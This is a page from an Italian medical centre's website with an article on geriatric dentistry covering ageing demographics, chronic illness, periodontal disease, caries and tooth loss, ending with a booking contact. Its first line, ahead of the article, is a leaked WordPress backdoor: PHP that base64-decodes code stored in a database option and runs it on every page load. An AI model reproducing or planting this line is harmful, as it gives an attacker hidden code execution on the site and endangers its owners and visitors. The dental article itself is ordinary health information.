add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Odontoiatria Geriatrica -

Odontoiatria Geriatrica

Nel 2010 la stima del numero di persone con età superiore ai 65 anni nel mondo era di 524 milioni. Nel 2050 questo numero raggiungerà il miliardo e mezzo. Per la prima volta nella storia dell’uomo il numero di adulti dai 65 anni in su è maggiore al numero dei bambini inferiori ai 5 anni. L’invecchiamento della popolazione è particolarmente evidente nei paesi più sviluppati quali: Nord America, Europa Occidentale, Giappone e Corea del Sud.

La persona anziana 

La persona anziana presenta patologie d’organo e sistemiche che spesso si correlano e aggravano la problematica orale del paziente. L’80% di ultra 70enni è portatore di almeno due patologie croniche quali:

  • diabete
  • ipertensione
  • cardiopatie
  • sindrome metabolica.

Da considerare che questi pazienti spesso assumono farmaci antiaggreganti ,anticoagulanti ,bifosfonati, etc. che rendono difficoltoso il trattamento odontoiatrico. Di contro, il malfunzionamento dell’apparato masticatorio interviene significativamente sulla nutrizione con conseguente perdita delle basi nutritive indebolendo la forza muscolare, articolare, immunitaria e psicologica. Da non trascurare poi che pazienti tra i 60 e 70 anni possono avere anche disagi estetici che spesso si traducono in perdite di opportunità sociali e di relazioni.

Dunque, dobbiamo considerare attentamente lo stato di salute del paziente anziano portatore di patologie mediche ed azione dei farmaci correlati per poter scegliere la terapia odontoiatrica più idonea.

Non vi è un comportamento standard ma il trattamento deve essere in simbiosi delle varie patologie, e se non presenti, deve essere considerato fragile anche un paziente anziano privo di esse.

Le patologie dentali più comuni e frequenti:

Parodontopatie

La malattia parodontale è certamente la malattia più diffusa nell’età adulto-geriatrica, rappresenta il tessuto più importante per tutte le tecniche odontoiatriche, tanto da esserne la base per ogni trattamento. La sua incidenza è compresa tra il 70 % ed il 90% della popolazione. Legata alla minor igiene orale conseguente anche a difficoltà come la diminuzione della vista, a piccoli tremori senili ed a patologie concomitanti.

Per questo è importante effettuare ogni sei mesi una visita dallo specialista per eseguire l’ablazione del tartaro ed insegnare ai pazienti il trattamento giornaliero da eseguire per una corretta igiene, che come dice un proverbio cinese “Dai un pesce a un uomo e nutrilo per un giorno, insegna a un uomo a pescare e lui mangerà per sempre” questo trattamento è l’unico che può prevenire in modo statisticamente significativo tutte le patologie odontoiatriche.

Carie

Il precoce rilevamento di queste permette di effettuare terapie conservative e non demolitive, quali l’estrazione dell’elemento dentale.

Edentulia

Importante è provvedere all’applicazione di una protesi non solo per la normale masticazione e l’estetica, ma per prevenire, data la difettosa masticazione, la perdita degli altri denti e incorrere in patologie più complesse. Per quanto riguarda l’applicazione delle protesi fisse quali impianti questa deve essere eseguita con indicazioni ancor più precise.

Tutte queste tecnologie se applicate correttamente risolvono la maggior parte delle problematiche odontoiatriche.
Nel paziente sano riescono a mantenere un equilibrio di salute, nel paziente malato contribuiscono a migliorare lo stato patologico.

Articolo a cura della Dr.ssa Giuseppina Di Folco Medico Specialista in Chirurgia d’Urgenza e Odontostomatologia, Paradontologia, Protesi e Chirurgia Orale

Per un consulto presso il nostro Centro è attivo il servizio di Odontoiatria Geriatrica. Un servizio ritagliato sulle specifiche esigenze di persone over 65. Informazioni o prenotazioni al Cup Bios 06/809641

0